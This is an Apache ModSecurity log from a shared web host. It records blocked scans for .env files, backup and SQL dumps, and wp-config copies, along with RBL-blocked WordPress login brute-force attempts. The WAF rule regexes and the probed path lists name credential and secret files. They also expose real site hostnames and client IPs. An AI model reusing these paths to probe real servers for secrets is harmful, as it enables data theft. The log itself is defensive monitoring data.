[Tue May 26 19:55:33.818185 2026] [security2:error] [pid 93576:tid 93820] [client 65.109.156.37:52687] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWtXWDRMqfxdEDkoszbFQAAAGw"]
[Tue May 26 19:55:33.902741 2026] [security2:error] [pid 93868:tid 94297] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/exchange/.env"] [unique_id "ahWtXUqK9k_ZUB2Vp25ViQAAAbY"]
[Tue May 26 19:55:34.057703 2026] [security2:error] [pid 93868:tid 94357] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/log/.env"] [unique_id "ahWtXkqK9k_ZUB2Vp25VjAAAAfI"]
[Tue May 26 19:55:34.235425 2026] [security2:error] [pid 93868:tid 94262] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtXkqK9k_ZUB2Vp25VkgAAAZM"]
[Tue May 26 19:55:34.235456 2026] [security2:error] [pid 93868:tid 94262] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtXkqK9k_ZUB2Vp25VkgAAAZM"]
[Tue May 26 19:55:34.235670 2026] [security2:error] [pid 93576:tid 93775] [client 65.109.156.37:52874] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/shop-2/shop-accessories/"] [unique_id "ahWtXmDRMqfxdEDkoszbHQAAAD8"]
[Tue May 26 19:55:34.367259 2026] [security2:error] [pid 93576:tid 93672] [remote 103.95.119.103:57160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtXmDRMqfxdEDkoszbHgAAKVs"]
[Tue May 26 19:55:34.501286 2026] [security2:error] [pid 93868:tid 94005] [remote 103.11.102.106:57012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWtXkqK9k_ZUB2Vp25VmAABoQY"]
[Tue May 26 19:55:34.527522 2026] [security2:error] [pid 93868:tid 94321] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ldap.php.bak"] [unique_id "ahWtXkqK9k_ZUB2Vp25VnwAAAc4"]
[Tue May 26 19:55:34.683403 2026] [security2:error] [pid 93868:tid 94294] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/upload/login.bak"] [unique_id "ahWtXkqK9k_ZUB2Vp25VpAAAAbM"]
[Tue May 26 19:55:34.838932 2026] [security2:error] [pid 93868:tid 94259] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ruby/.env"] [unique_id "ahWtXkqK9k_ZUB2Vp25VqQAAAZA"]
[Tue May 26 19:55:35.913348 2026] [security2:error] [pid 93868:tid 94312] [client 185.177.72.53:5626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/restaurant-app/.env"] [unique_id "ahWtX0qK9k_ZUB2Vp25VzwAAAcU"]
[Tue May 26 19:55:36.350558 2026] [security2:error] [pid 93868:tid 94385] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtX0qK9k_ZUB2Vp25V1AAAAg4"]
[Tue May 26 19:55:36.560476 2026] [security2:error] [pid 93868:tid 94346] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahWtYEqK9k_ZUB2Vp25V7gAAAec"]
[Tue May 26 19:55:36.724327 2026] [security2:error] [pid 93868:tid 94278] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/twitter.php.bak"] [unique_id "ahWtYEqK9k_ZUB2Vp25V8gAAAaM"]
[Tue May 26 19:55:37.879826 2026] [security2:error] [pid 93868:tid 94361] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/log.sql"] [unique_id "ahWtYUqK9k_ZUB2Vp25WGgAAAfY"]
[Tue May 26 19:55:38.211047 2026] [security2:error] [pid 93868:tid 94376] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/examples/with-react-relay-network-modern/.env"] [unique_id "ahWtYkqK9k_ZUB2Vp25WKQAAAgU"]
[Tue May 26 19:55:38.475060 2026] [security2:error] [pid 93868:tid 94318] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtYkqK9k_ZUB2Vp25WHwAAAcs"]
[Tue May 26 19:55:38.702881 2026] [security2:error] [pid 93868:tid 94301] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/promotions/.env"] [unique_id "ahWtYkqK9k_ZUB2Vp25WQwAAAbo"]
[Tue May 26 19:55:39.033127 2026] [security2:error] [pid 93868:tid 94381] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/golang-app/.env"] [unique_id "ahWtY0qK9k_ZUB2Vp25WTgAAAgo"]
[Tue May 26 19:55:40.023252 2026] [security2:error] [pid 93868:tid 94376] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mysql.sql"] [unique_id "ahWtZEqK9k_ZUB2Vp25WeAAAAgU"]
[Tue May 26 19:55:40.209735 2026] [proxy:error] [pid 93576:tid 93760] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:55:40.209814 2026] [proxy_http:error] [pid 93576:tid 93760] [client 205.210.31.145:61758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:55:40.210384 2026] [proxy:error] [pid 93576:tid 93760] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:55:40.210418 2026] [proxy_http:error] [pid 93576:tid 93760] [client 205.210.31.145:61758] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:55:40.346314 2026] [security2:error] [pid 93868:tid 94351] [client 102.164.188.174:24709] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWtZEqK9k_ZUB2Vp25WegAB7C0"], referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=7&paymenttype=2&datepday=30&datepmonth=4&datepyear=2026
[Tue May 26 19:55:40.516735 2026] [security2:error] [pid 93868:tid 94384] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/FRONTEND/.env"] [unique_id "ahWtZEqK9k_ZUB2Vp25WiAAAAg0"]
[Tue May 26 19:55:41.090416 2026] [security2:error] [pid 93576:tid 93676] [remote 162.240.102.228:48344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtZGDRMqfxdEDkoszbcAAAe18"]
[Tue May 26 19:55:41.409086 2026] [security2:error] [pid 93576:tid 93678] [remote 162.240.102.228:48344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.102.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtZWDRMqfxdEDkoszbeAAAdGE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:55:41.504454 2026] [security2:error] [pid 93868:tid 94328] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/account.php.old"] [unique_id "ahWtZUqK9k_ZUB2Vp25WrwAAAdU"]
[Tue May 26 19:55:41.541426 2026] [security2:error] [pid 93576:tid 93781] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtZWDRMqfxdEDkoszbcwAAAEU"]
[Tue May 26 19:55:41.667398 2026] [security2:error] [pid 93868:tid 94379] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/site.sql"] [unique_id "ahWtZUqK9k_ZUB2Vp25WuQAAAgg"]
[Tue May 26 19:55:41.810563 2026] [security2:error] [pid 93868:tid 94324] [client 218.152.33.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtZUqK9k_ZUB2Vp25WuwAAAdE"], referer: https://www.anujtradingco.com/
[Tue May 26 19:55:41.995121 2026] [security2:error] [pid 93868:tid 94289] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hotel-app/api/.env"] [unique_id "ahWtZUqK9k_ZUB2Vp25WyAAAAa4"]
[Tue May 26 19:55:42.158554 2026] [security2:error] [pid 93868:tid 94275] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/config/secret.bak"] [unique_id "ahWtZkqK9k_ZUB2Vp25W0gAAAaA"]
[Tue May 26 19:55:42.321366 2026] [security2:error] [pid 93868:tid 94372] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/db.bak"] [unique_id "ahWtZkqK9k_ZUB2Vp25W3AAAAgE"]
[Tue May 26 19:55:42.979714 2026] [security2:error] [pid 93868:tid 94317] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/backup/db_backup.sql"] [unique_id "ahWtZkqK9k_ZUB2Vp25W9wAAAco"]
[Tue May 26 19:55:43.307613 2026] [security2:error] [pid 93868:tid 94324] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/discount/.env"] [unique_id "ahWtZ0qK9k_ZUB2Vp25XBgAAAdE"]
[Tue May 26 19:55:43.472844 2026] [security2:error] [pid 93868:tid 94344] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer.yaml.bak"] [unique_id "ahWtZ0qK9k_ZUB2Vp25XCgAAAeU"]
[Tue May 26 19:55:43.809554 2026] [security2:error] [pid 93576:tid 93742] [client 218.152.33.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtZ2DRMqfxdEDkoszbmQAAAB4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1517432&moderation-hash=99f98c83f17062a2035aa0ca7e2bec67
[Tue May 26 19:55:44.297202 2026] [security2:error] [pid 93868:tid 94283] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/home.php.bak"] [unique_id "ahWtaEqK9k_ZUB2Vp25XLQAAAag"]
[Tue May 26 19:55:44.346158 2026] [security2:error] [pid 93868:tid 94281] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtZ0qK9k_ZUB2Vp25XIAAAAaY"]
[Tue May 26 19:55:44.752715 2026] [security2:error] [pid 93576:tid 93625] [remote 94.76.235.103:60648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtaGDRMqfxdEDkoszbqwAAZi4"]
[Tue May 26 19:55:44.957052 2026] [security2:error] [pid 93868:tid 94330] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/examples/02-complex-example/.env"] [unique_id "ahWtaEqK9k_ZUB2Vp25XRAAAAdc"]
[Tue May 26 19:55:45.292195 2026] [security2:error] [pid 93576:tid 93580] [remote 103.11.102.106:48950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtaWDRMqfxdEDkoszbvQAADwE"]
[Tue May 26 19:55:46.431067 2026] [security2:error] [pid 93576:tid 93589] [remote 94.76.235.103:60648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtamDRMqfxdEDkoszb3gAALAo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:55:46.946155 2026] [security2:error] [pid 93576:tid 93785] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtamDRMqfxdEDkoszb5AAAAEk"]
[Tue May 26 19:55:47.923340 2026] [security2:error] [pid 93868:tid 94326] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/confirm/.env"] [unique_id "ahWta0qK9k_ZUB2Vp25XqwAAAdM"]
[Tue May 26 19:55:48.145126 2026] [security2:error] [pid 93576:tid 93832] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtbGDRMqfxdEDkoszb-gAAAHg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:55:48.416585 2026] [security2:error] [pid 93868:tid 94346] [client 185.177.72.53:1796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/order.php.bak"] [unique_id "ahWtbEqK9k_ZUB2Vp25XvwAAAec"]
[Tue May 26 19:55:48.917150 2026] [security2:error] [pid 93868:tid 94335] [client 185.177.72.53:62728] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.docker.dev.backup"] [unique_id "ahWtbEqK9k_ZUB2Vp25XzAAAAdw"]
[Tue May 26 19:55:49.363475 2026] [security2:error] [pid 93868:tid 94292] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtbUqK9k_ZUB2Vp25X4AAAAbE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443274&moderation-hash=a2e0dc874b9c562e09cc11574bf5cf88
[Tue May 26 19:55:49.413297 2026] [security2:error] [pid 93868:tid 94337] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtbEqK9k_ZUB2Vp25X1QAAAd4"]
